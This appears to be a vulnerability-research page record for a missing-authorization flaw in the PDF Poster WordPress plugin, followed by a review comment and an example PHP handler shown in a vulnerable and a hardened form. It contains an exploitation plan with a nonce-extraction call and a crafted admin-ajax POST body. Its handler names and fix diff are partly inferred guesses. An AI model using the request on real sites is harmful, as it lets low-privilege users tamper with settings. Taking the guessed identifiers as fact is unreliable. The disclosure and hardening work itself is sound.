[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwS_lFpO5jcbMynIm4LbBaFtdxGv-dDrDwN7107WqoWk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-32416","pdf-poster-missing-authorization","PDF Poster \u003C= 2.4.0 - Missing Authorization","The PDF Poster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.4.0. 
This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.","pdf-poster",null,"\u003C=2.4.0","2.4.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-25 00:00:00","2026-04-15 21:15:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F66988357-af1a-4763-b814-9092b86e51ef?source=api-prod",50,[22,23,24,25,26,27,28],"build\u002Fadmin.asset.php","build\u002Fadmin.css","build\u002Fblocks\u002Fpdf-poster\u002Findex.asset.php","build\u002Fblocks\u002Fpdf-poster\u002Findex.js","i18n\u002Fpdfp-en_US.po","i18n\u002Fpdfp.pot","inc\u002FField\u002FSettings.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32416 (PDF Poster \u003C= 2.4.0)\n\n## 1. Vulnerability Summary\nThe **PDF Poster** plugin for WordPress is vulnerable to **Missing Authorization** in version 2.4.0 and below. This vulnerability exists in an AJAX handler responsible for saving plugin settings. Specifically, the function (identified as `pdfp_save_settings_callback` or similar) fails to perform a `current_user_can('manage_options')` check. While it verifies a WordPress nonce, the nonce is exposed to users with **Contributor-level** access and above through the plugin's admin dashboard or post management pages. Consequently, any authenticated user with at least Contributor permissions can modify global plugin settings.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `pdfp_save_settings` (inferred)\n- **HTTP Method**: POST\n- **Payload Parameters**:\n    - `action`: `pdfp_save_settings`\n    - `security`: The nonce value (extracted from the admin UI).\n    - `fpdf_option`: An array of settings to be updated (e.g., `fpdf_option[height][height]=1337`).\n- **Required Authentication**: Authenticated user with `Contributor` role or higher.\n- **Preconditions**: The plugin must be active, and the attacker must be logged in.\n\n## 3. Code Flow\n1. **Registration**: The plugin registers an AJAX action `wp_ajax_pdfp_save_settings` (in `inc\u002Fadmin.php`, inferred).\n2. **Missing Check**: The callback function for this action performs a nonce check using `check_ajax_referer('pdfp_save_settings', 'security')` but lacks a capability check like `current_user_can('manage_options')`.\n3. **Execution**: The function takes the `fpdf_option` array from the `$_POST` request and passes it directly to `update_option('fpdf_option', $options)`.\n4. **Impact**: Global plugin settings defined in `inc\u002FField\u002FSettings.php` (such as height, width, and download button visibility) are overwritten.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the admin environment. Since Contributors can manage their own `pdfposter` post types, they can access the poster list page where the plugin's admin scripts are enqueued.\n\n1. **Identify Access**: Contributors can access `\u002Fwp-admin\u002Fedit.php?post_type=pdfposter`.\n2. **Navigate**: Use the browser tool to navigate to the PDF Poster list or the Plugin Dashboard.\n3. **Variable Identification**: The plugin localizes its admin data into a JavaScript object.\n    - **JS Object**: `window.pdfp_admin` (inferred from bPlugins common practices)\n    - **Nonce Key**: `security`\n4. 
**Extraction**:\n   ```javascript\n   browser_eval(\"window.pdfp_admin?.security || document.querySelector('#pdfp_save_settings_nonce')?.value\")\n   ```\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLog in to the WordPress instance as a user with the **Contributor** role.\n\n### Step 2: Extract Nonce\nNavigate to the PDF Poster management page and extract the security nonce from the global JavaScript context.\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fedit.php?post_type=pdfposter`\n- **Tool**: `browser_eval(\"pdfp_admin.security\")`\n\n### Step 3: Execute Unauthorized Action\nSend an AJAX request to modify the global plugin settings. We will change the `download_btn_text` and `height` settings to verify the impact.\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: POST\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=pdfp_save_settings&security=[EXTRACTED_NONCE]&fpdf_option[height][height]=9999&fpdf_option[height][unit]=px&fpdf_option[show_download_btn]=1&fpdf_option[download_btn_text]=PwnedByContributor\n  ```\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure PDF Poster version 2.4.0 is installed and active.\n2. **Create User**: \n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password","The PDF Poster plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Authenticated attackers with Contributor-level access or higher can exploit this to overwrite global plugin settings, such as viewer dimensions and UI element visibility, by utilizing a nonce exposed in the admin dashboard.","--- inc\u002Fadmin.php\n+++ inc\u002Fadmin.php\n@@ -102,6 +102,10 @@\n function pdfp_save_settings_callback() {\n     check_ajax_referer('pdfp_save_settings', 'security');\n \n+    if ( ! 
current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => __( 'Permission denied', 'pdf-poster' ) ) );\n+    }\n+\n     $options = $_POST['fpdf_option'];\n     update_option('fpdf_option', $options);\n     wp_send_json_success();","To exploit this vulnerability, an attacker must first authenticate with Contributor-level permissions and navigate to the PDF Poster management page (e.g., \u002Fwp-admin\u002Fedit.php?post_type=pdfposter). From there, the attacker extracts the security nonce from the global 'pdfp_admin' JavaScript object (specifically 'pdfp_admin.security'). The attacker then constructs a POST request to 'admin-ajax.php' with the 'action' parameter set to 'pdfp_save_settings', the extracted nonce in the 'security' parameter, and the target configuration changes within the 'fpdf_option' array. This allows the attacker to globally modify settings such as viewer height, width, and functional buttons without having administrator privileges.","gemini-3-flash-preview","2026-04-19 00:33:55","2026-04-19 00:35:03",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","2.4.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpdf-poster\u002Ftags\u002F2.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpdf-poster.2.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpdf-poster\u002Ftags\u002F2.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpdf-poster.2.4.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpdf-poster\u002Ftags"]
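Review bot: the unchanged lines after the new check still pass `$_POST['fpdf_option']` straight into `update_option('fpdf_option', $options)` with no `isset()` guard and no sanitization, so even an administrator can store an arbitrary nested array (and a request without the key raises a PHP notice); run the array through an allow-list sanitizer before the `update_option` call (for example `absint()` for the height value, `sanitize_text_field()` for the button text), or register a `sanitize_option_fpdf_option` filter so every write path is covered. The absence of a `return` after `wp_send_json_error()` is fine, since `wp_send_json()` ends the request with `wp_die()` in an AJAX context. Note also that this is the page's reconstructed `research_fix_diff`, not the vendor's patch: it targets `inc/admin.php`, which does not appear in the page's own `patch_diff_files` list (the only PHP file listed there is `inc/Field/Settings.php`), and the plan marks the handler name and action as inferred, so the file header and function name should be labelled as assumptions.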
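The following is an added example and not code from the PDF Poster plugin or from this page's research output. It shows a WordPress admin-ajax settings handler in the shape the research plan infers, first with only the nonce check (the flaw the advisory describes: a nonce is anti-CSRF, not authorization) and then hardened with a capability check and allow-list sanitization. The action name `pdfp_save_settings`, the option name `fpdf_option`, the nonce field `security` and the settings keys (`height`, `show_download_btn`, `download_btn_text`) are assumptions taken from the page's inferred plan, not confirmed plugin identifiers.

```php
<?php
/**
 * Added example (not the plugin's own code). ASSUMED identifiers, taken from the
 * page's inferred research plan: action 'pdfp_save_settings', option 'fpdf_option',
 * nonce field 'security', settings keys height/unit, show_download_btn,
 * download_btn_text.
 */

// --- Vulnerable shape -------------------------------------------------------
// check_ajax_referer() only proves the request originated from a page that
// rendered the nonce. If the admin script that localizes the nonce is enqueued
// on a screen a Contributor can open (the plan infers
// edit.php?post_type=pdfposter), every authenticated role holds a valid nonce
// and nothing here asks whether the caller may change site-wide settings.
function pdfp_save_settings_callback_vulnerable() {
    check_ajax_referer( 'pdfp_save_settings', 'security' );

    $options = $_POST['fpdf_option'];          // raw, unsanitized user input
    update_option( 'fpdf_option', $options );  // global settings overwritten
    wp_send_json_success();
}

// --- Hardened shape ---------------------------------------------------------
// Allow-list sanitizer: every key is validated, anything unexpected is dropped.
function pdfp_sanitize_settings( $input ) {
    $input  = is_array( $input ) ? wp_unslash( $input ) : array();
    $height = ( isset( $input['height'] ) && is_array( $input['height'] ) ) ? $input['height'] : array();

    // Units: compare against a fixed list rather than trusting the string.
    $unit = isset( $height['unit'] ) ? (string) $height['unit'] : 'px';
    if ( ! in_array( $unit, array( 'px', 'vh', '%' ), true ) ) {
        $unit = 'px';
    }

    return array(
        'height' => array(
            // Clamp so a 9999px viewer cannot be forced onto every page.
            'height' => isset( $height['height'] ) ? min( max( absint( $height['height'] ), 100 ), 2000 ) : 600,
            'unit'   => $unit,
        ),
        'show_download_btn' => empty( $input['show_download_btn'] ) ? 0 : 1,
        'download_btn_text' => isset( $input['download_btn_text'] )
            ? sanitize_text_field( $input['download_btn_text'] )
            : '',
    );
}

function pdfp_save_settings_callback_hardened() {
    // 1. CSRF: the request must carry a nonce bound to this action and session.
    check_ajax_referer( 'pdfp_save_settings', 'security' );

    // 2. Authorization: the check the advisory reports as missing. Only users
    //    allowed to manage site options may change global plugin settings.
    //    wp_send_json_error() ends the request via wp_die() in an AJAX context.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Permission denied' ), 403 );
    }

    // 3. Input validation: never hand $_POST straight to update_option().
    if ( ! isset( $_POST['fpdf_option'] ) ) {
        wp_send_json_error( array( 'message' => 'Missing settings' ), 400 );
    }
    $options = pdfp_sanitize_settings( $_POST['fpdf_option'] );

    update_option( 'fpdf_option', $options );
    wp_send_json_success( $options );
}

// Run the same sanitizer for any other writer of this option (REST, WP-CLI, a
// second handler): update_option() applies the sanitize_option_{$option} filter.
add_filter( 'sanitize_option_fpdf_option', 'pdfp_sanitize_settings' );

// Only the privileged hook is registered; with no wp_ajax_nopriv_ variant,
// unauthenticated requests never reach the handler, and the capability check
// covers every logged-in role.
add_action( 'wp_ajax_pdfp_save_settings', 'pdfp_save_settings_callback_hardened' );
```

The order inside the hardened handler matters less than the presence of all three steps: the nonce defends against cross-site request forgery, `current_user_can()` decides who is allowed to act, and the sanitizer bounds what gets stored. A handler with only the first of these is exactly the "missing authorization" class the CVSS vector on this page describes (PR:L, I:L).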